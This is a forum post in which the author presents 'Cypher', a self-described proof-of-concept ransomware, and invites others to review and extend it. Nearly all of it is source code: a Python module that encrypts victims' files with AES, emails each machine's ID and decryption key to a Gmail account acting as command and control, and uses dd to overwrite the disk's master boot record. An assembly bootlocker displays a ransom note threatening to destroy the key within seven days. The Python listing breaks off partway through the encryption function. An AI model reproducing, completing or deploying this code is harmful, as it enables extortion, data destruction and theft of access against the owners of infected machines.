cypher ransomware

Cypher is a proof of concept ransomware which implements the PyCrpto module and uses gmail(Currently) as a simple command and control server. It is a work in progress as of yet and i will be releasing updates periodically depending on the amount of time i have to work on the project. I haven't had a chance to test it fully yet so i would appreciate it if you could review my code and leave some of your ideas, thoughts and/or comments.

Cypher operates by generating a unique client ID for each box that has been infected. The client ID and encryption key will sent via email to a gmail adress by leveraging python's SMTP lib. After Cypher has enumerated the files we wish to encrypt the multiprocessing and PyCrypto libs are employed to do the actual encrypting. I opted to use the multiprocessing lib to speed up the encryption process.
Finally Cypher will write out a README note and the client ID which would have to be relayed to the operator in orer to retrieve the proper decrypting binary and key respectively.


Below is the source code for the module that does the actual encrypting, and contacts gmail. The decrypting binary is next on the to do list. Alternatively you can read the source code and README.md at my repo on github.

Code: # Cypher is a work in progress, as such this is an Alpha release of the encryption # module, for reporting bugs feel free to open an issue or should you wish to # collaborate on this, pull requests are welcomed as well. import os import sys import random import struct import smtplib import string import datetime import time import getpass as gp from Crypto.Cipher import AES from Crypto.PublicKey import RSA from multiprocessing import Pool # Function to generate our client ID def gen_client_ID(size=12, chars=string.ascii_uppercase + string.digits): return ''.join(random.choice(chars) for _ in range(size)) ID = gen_client_ID(12) key = RSA.generate(2048) exKey = RSA.exportKey('PEM') # Check to see if we're on linux and have root, if so use dd to override the MBR with our bootlocker. if sys.platform == 'linux2' and gp.getuser() == 'root': try: os.system("dd if=boot.bin of=/dev/hda bs=512 count=1 && exit") except: pass else: try: os.system("sudo dd if=boot.bin of=/dev/hda bs=512 count=1 && exit") except: pass def send_ID_Key(): ts = datetime.datetime.now() SERVER = "smtp.gmail.com" PORT = 587 USER= "address@gmail.com" # Specify Username Here PASS= "prettyflypassword" # Specify Password Here FROM = USER TO = ["address@gmail.com"] SUBJECT = "Ransomware data: "+str(ts) MESSAGE = """\Client ID: %s Decryption Key: %s """ % (ID, exKey) message = """\ From: %s To: %s Subject: %s %s """ % (FROM, ", ".join(TO), SUBJECT, MESSAGE) try: server = smtplib.SMTP() server.connect(SERVER, PORT) server.starttls() server.login(USER, PASS) server.sendmail(FROM, TO, message) server.quit() except Exception as e: # print e pass def encrypt_file(key, in_filename, out_filename=None, chunksize=64*1024): if not out_filename: out_filename = in_filename + '.crypt' iv = ''.join(chr(random.randint(0, 0xFF)) for i in range(16)) encryptor = AES.new(key, AES.MODE_CBC, iv) filesize = os.path.getsize(in_filename) with open(in_filename, 'rb') as infile: with open(out_filename, 'wb') as outfile: outfile.write(struct.pack('

Bootlocker source in ASM, thanks NO-OP!

Code: [BITS 16] [ORG 0x7C00] MOV SI, Msg CALL OutStr JMP $ OutChar: MOV AH, 0x0E MOV BH, 0x00 MOV BL, 0x07 INT 0x10 RET OutStr: next_char: MOV AL, [SI] INC SI OR AL, AL JZ exit_function CALL OutChar JMP next_char exit_function: RET Msg db 0xA, 0xD, 0xA, 0xD db '########################################################', 0xA, 0xD db '# Your harddrive is encrypted with military grade #', 0xA, 0xD db '# encryption, you wont get your files back, since #', 0xA, 0xD db '# the Cypher ransomware is still under construction #', 0xA, 0xD db ' ', 0xA, 0xD db '########################################################', 0xA, 0xD, 0xA, 0xD db 'Unfortunately there are only 7 days left until the encryption key is destroyed.', 0xA, 0xD, 0xA, 0xD db 'Have a nice day,', 0xA, 0xD db ' The Cypher Project', 0 TIMES 510 - ($ - $$) db 0 DW 0xAA55